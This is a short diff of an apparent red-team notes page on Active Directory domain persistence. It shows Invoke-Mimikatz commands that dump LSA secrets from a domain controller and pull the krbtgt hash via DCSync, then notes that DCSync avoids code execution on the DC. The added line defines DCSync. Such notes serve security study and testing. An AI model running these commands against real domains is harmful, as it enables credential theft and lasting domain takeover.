mvc1009/hackingnotes/_docs/active-directory/domain-persistence.md

 Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dc.corp.local
 Invoke-Mimikatz -Command '"lsadump::dcsync /user:corp\krbtgt"'
 ```
 > **RedTeam Note**: Using DCSync option does not need code execution on the target DC.
 For that reason is more silent than dumping the LSA.
+DCSync is a technique which allows an attacker to hijack the Domain Controller account and replicate data such as passwords of all domain controllers.

 After that we need to create the ticket.